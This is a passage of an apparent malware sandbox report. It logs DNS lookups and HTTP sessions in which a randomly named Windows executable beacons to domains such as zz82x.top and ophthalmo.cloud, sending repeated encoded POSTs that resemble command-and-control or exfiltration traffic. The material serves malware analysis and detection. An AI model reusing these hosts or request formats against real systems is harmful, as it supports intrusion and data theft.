                                          Dec 5, 2024 18:22:29.078017950 CET192.168.2.81.1.1.10xf458Standard query (0)www.bonusgame2024.onlineA (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:22:37.418112040 CET192.168.2.81.1.1.10xa55fStandard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:22:52.605504990 CET192.168.2.81.1.1.10x8e8Standard query (0)www.ophthalmo.cloudA (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:23:07.606266022 CET192.168.2.81.1.1.10x2fafStandard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 5, 2024 18:22:12.737404108 CET1.1.1.1192.168.2.80xedc8No error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 5, 2024 18:22:12.737404108 CET1.1.1.1192.168.2.80xedc8No error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:22:12.737404108 CET1.1.1.1192.168.2.80xedc8No error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:22:29.299346924 CET1.1.1.1192.168.2.80xf458Name error (3)www.bonusgame2024.onlinenonenoneA (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:22:37.940063000 CET1.1.1.1192.168.2.80xa55fNo error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                                          Dec 5, 2024 18:22:37.940063000 CET1.1.1.1192.168.2.80xa55fNo error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:22:53.127178907 CET1.1.1.1192.168.2.80x8e8No error (0)www.ophthalmo.cloud217.160.0.207A (IP address)IN (0x0001)false
                                          Dec 5, 2024 18:23:08.494102001 CET1.1.1.1192.168.2.80x2fafNo error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.healthyloveforall.net
                                          • www.zz82x.top
                                          • www.ophthalmo.cloud
                                          • www.ngmr.xyz

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.8497093.33.130.190803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:12.873578072 CET522OUTGET /r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q== HTTP/1.1
                                          Host: www.healthyloveforall.net
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Dec 5, 2024 18:22:13.962656975 CET403INHTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Thu, 05 Dec 2024 17:22:13 GMT
                                          Content-Type: text/html
                                          Content-Length: 263
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 34 3d 4e 52 68 38 26 44 54 73 34 43 44 34 3d 45 73 52 58 58 37 76 45 6e 55 4a 41 50 34 35 39 6f 39 45 50 47 68 47 2f 5a 61 31 54 44 71 4b 6f 39 2f 6e 53 59 37 4c 5a 4f 36 6b 79 39 76 6f 2f 35 7a 75 78 37 37 5a 61 6f 71 4a 64 77 35 37 4e 68 72 69 73 66 35 65 31 43 33 54 51 46 4c 4e 4c 69 4e 63 71 49 48 4a 77 68 53 79 73 73 67 32 77 62 74 62 36 6a 31 41 4d 4d 63 76 65 32 50 65 54 7a 79 71 33 64 67 35 39 36 38 59 65 33 41 33 52 37 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q=="}</script></head></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.84974338.47.232.196803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:38.078440905 CET769OUTPOST /fk06/ HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.zz82x.top
                                          Connection: close
                                          Content-Length: 208
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.zz82x.top/fk06/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 4a 67 39 36 51 54 4f 56 61 62 7a 49 70 69 4f 4f 6b 38 54 46 4b 6b 78 50 59 6c 68 48 36 4c 36 6d 6b 57 6d 65 7a 4d 3d
                                          Data Ascii: DTs4CD4=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Jg96QTOVabzIpiOOk8TFKkxPYlhH6L6mkWmezM=
                                          Dec 5, 2024 18:22:39.636781931 CET691INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 05 Dec 2024 17:22:39 GMT
                                          Content-Type: text/html
                                          Content-Length: 548
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.84974938.47.232.196803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:40.738253117 CET789OUTPOST /fk06/ HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.zz82x.top
                                          Connection: close
                                          Content-Length: 228
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.zz82x.top/fk06/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 61 34 51 33 47 63 65 56 42 73 57 7a 62 43 74 44 45 32 53 73 69 34 4a 32 7a 2b 38 71 71 4e 42 52 51 77 79 55 6c 70 74 67 47 2f 32 64 6a 74 44 43 4b 4e 7a 35 4b 39 62 70 34 6f 38 6b 59 66 46 4e 42 78 55 42 4f 42 30 4a 73 57 47 77 57 51 78 78 73 75 7a 77 73 41 56 70 2f 42 74 76 42 4c 2f 47 4c 5a 6d 76 58 69 49 55 49 44 46 75 6a 2b 49 5a 4c 2f 59 64 65 51 35 62 6b 6a 77 53 54 64 56 59 61 58 4a 66 50 6b 55 47 30 56 47 4b 4d 61 50 62 4e 58 43 4e 57 53 38 48 47 57 41 6b 59 41 6b 67 7a 76 2b 75 46 6b 33 64 6f 6c 72 37 47 41 50 30 70 48
                                          Data Ascii: DTs4CD4=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVga4Q3GceVBsWzbCtDE2Ssi4J2z+8qqNBRQwyUlptgG/2djtDCKNz5K9bp4o8kYfFNBxUBOB0JsWGwWQxxsuzwsAVp/BtvBL/GLZmvXiIUIDFuj+IZL/YdeQ5bkjwSTdVYaXJfPkUG0VGKMaPbNXCNWS8HGWAkYAkgzv+uFk3dolr7GAP0pH


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.84975538.47.232.196803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:43.392133951 CET1806OUTPOST /fk06/ HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.zz82x.top
                                          Connection: close
                                          Content-Length: 1244
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.zz82x.top/fk06/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 43 34 51 6d 6d 63 66 79 56 73 45 6a 62 43 7a 54 45 7a 53 73 6a 34 4a 32 72 68 38 71 6e 34 42 53 34 77 79 32 74 70 35 46 79 2f 34 74 6a 74 63 53 4b 49 2b 5a 4b 73 62 70 6f 6b 38 6b 49 66 46 4e 42 78 55 44 57 42 78 6f 73 57 41 77 57 58 35 52 73 69 6b 41 73 6f 56 70 6e 2f 74 76 46 62 2b 32 72 5a 6c 4c 4c 69 4c 6e 73 44 61 65 6a 34 63 35 4c 33 59 64 54 4f 35 62 4a 63 77 54 33 7a 56 61 4b 58 49 70 79 37 4e 58 31 4a 61 73 51 46 4d 71 39 30 4d 75 71 68 79 31 48 6d 45 56 30 75 71 33 2f 38 2b 50 51 72 39 50 68 74 35 63 4f 70 42 68 73 55 73 68 52 4a 74 39 43 78 54 59 6c 2f 30 57 76 53 6a 6a 74 6c 4f 37 71 73 6b 46 2b 69 66 5a 6d 45 32 59 47 76 6d 4b 51 72 72 6c 79 6b 6c 30 6b 44 62 32 46 58 46 71 6b 58 31 4c 61 4c 6e 46 32 6c 4a 45 36 74 77 74 62 75 63 71 4b 37 48 6f 45 68 62 63 6a 36 55 72 74 67 30 4c 66 38 58 72 6e 54 72 32 67 7a 30 46 6e 72 37 64 6b 4e 7a 61 [TRUNCATED]
                                          Data Ascii: DTs4CD4=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVgC4QmmcfyVsEjbCzTEzSsj4J2rh8qn4BS4wy2tp5Fy/4tjtcSKI+ZKsbpok8kIfFNBxUDWBxosWAwWX5RsikAsoVpn/tvFb+2rZlLLiLnsDaej4c5L3YdTO5bJcwT3zVaKXIpy7NX1JasQFMq90Muqhy1HmEV0uq3/8+PQr9Pht5cOpBhsUshRJt9CxTYl/0WvSjjtlO7qskF+ifZmE2YGvmKQrrlykl0kDb2FXFqkX1LaLnF2lJE6twtbucqK7HoEhbcj6Urtg0Lf8XrnTr2gz0Fnr7dkNzaDgFwmfEVEdLq2QXL1WJvp15LdpbdtKLXKnDE5xGynw1C/JsTEQJuW9twQbDkE7AWynyqbJggzgqhP7qcfHOvyN129++uUEBzvuzYdNwY6541ttHwDN19gXJaLU4stKh1x4eX6JVGfPyFVAl23tSj1IX1SN3Ghwyge/azmlt8Ei02Oge4wsz7vV2Ebxp5G/aGR2PKuPcq8hyWBINn5gVIjI/twvhio4X3jEx6DX9YzI/FRLwWjbvUwQxc1Dyl1QT6dLqyiUs/5ePgICOXay6OCuXXzMvERG4DrZFfxGVajvFfaaOUTnvEdTUOij9tSlXINY8BhD+2e6H6izJX2hvpH+VJR+gOU66s535qx9WustEFaJ+/Lhh8MMd7YHZi/eppl8cM7AThmtXruK+dThHAKyCDsLYiXb0EWvpPjoiXyyJuQwZkoHMz2tsAKS/wVDA+eo6KM7QmFaQWnEGDCRTSxlaKVrk60Tmt8YiazsSbQKPYZAN7a/aYeQt/p0m3tGi7gbLEXxDSKem3A0WFpdMYolE5STjcdFRHJx0d7bpHiIzzocbcWVOPD2snQtXOkUYSKCXWhPg7Cae65MTcg1MubMX4VbZPmlfV6l94e/LhmXM7+H1Ewvd0yzEmYbVAnTXJW4xe4LxSTs+N7IJ3JZUp75NdDE6mWy3sMb [TRUNCATED]
                                          Dec 5, 2024 18:22:44.920101881 CET691INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 05 Dec 2024 17:22:44 GMT
                                          Content-Type: text/html
                                          Content-Length: 548
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.84976438.47.232.196803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:46.046241045 CET510OUTGET /fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ== HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Dec 5, 2024 18:22:47.592560053 CET691INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 05 Dec 2024 17:22:47 GMT
                                          Content-Type: text/html
                                          Content-Length: 548
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.849782217.160.0.207803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:53.261367083 CET787OUTPOST /mgg3/ HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ophthalmo.cloud
                                          Connection: close
                                          Content-Length: 208
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ophthalmo.cloud/mgg3/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 70 4d 50 46 43 68 37 66 31 70 67 4f 4c 33 49 52 73 6b 67 63 35 30 2b 4a 55 68 44 30 75 50 6b 6f 77 32 53 4c 6b 62 35 41 4d 4e 78 52 65 66 6f 4a 56 73 48 79 74 4c 50 31 4d 49 78 73 58 72 66 52 71 78 63 7a 4d 5a 64 6a 7a 32 35 6c 34 2f 4b 46 50 47 6b 71 2f 36 66 4a 32 37 48 77 2f 50 62 58 31 68 6f 46 59 78 68 46 57 67 41 41 69 33 6a 31 69 36 39 39 79 55 56 51 41 56 4e 66 53 6c 61 35 79 53 2f 44 53 4c 38 6b 79 39 72 6d 2f 58 76 4d 63 53 41 37 46 64 6b 4f 33 66 6c 54 41 49 2f 39 33 65 50 73 34 70 67 45 41 6c 71 38 43 2b 73 37 77 52 75 45 4d 6e 64 6f 6d 69 77 3d
                                          Data Ascii: DTs4CD4=tGqcJQu3iOnopMPFCh7f1pgOL3IRskgc50+JUhD0uPkow2SLkb5AMNxRefoJVsHytLP1MIxsXrfRqxczMZdjz25l4/KFPGkq/6fJ27Hw/PbX1hoFYxhFWgAAi3j1i699yUVQAVNfSla5yS/DSL8ky9rm/XvMcSA7FdkO3flTAI/93ePs4pgEAlq8C+s7wRuEMndomiw=
                                          Dec 5, 2024 18:22:54.540719032 CET779INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:22:54 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Content-Encoding: gzip
                                          Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                          Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.849788217.160.0.207803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:55.925795078 CET807OUTPOST /mgg3/ HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ophthalmo.cloud
                                          Connection: close
                                          Content-Length: 228
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ophthalmo.cloud/mgg3/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 51 6f 7a 58 69 4c 6e 61 35 41 42 74 78 52 52 2f 6f 56 4b 38 48 70 74 4c 44 44 4d 4d 78 73 58 74 7a 52 71 77 73 7a 4c 75 78 6b 7a 6d 35 6a 77 66 4b 44 58 6d 6b 71 2f 36 66 4a 32 37 6a 57 2f 50 44 58 30 56 73 46 59 54 4a 47 58 67 41 50 6c 33 6a 31 70 61 39 35 79 55 55 31 41 51 73 43 53 6e 69 35 79 53 50 44 53 36 38 6a 34 39 72 67 78 33 75 2b 61 41 42 70 46 73 30 6f 78 70 74 38 4e 4a 32 48 32 6f 69 47 69 4c 6f 43 44 6c 43 58 43 39 45 4e 31 6d 7a 73 57 45 4e 59 34 31 6b 72 7a 6e 69 70 57 66 71 37 30 49 76 39 75 50 6a 4a 35 35 6c 68
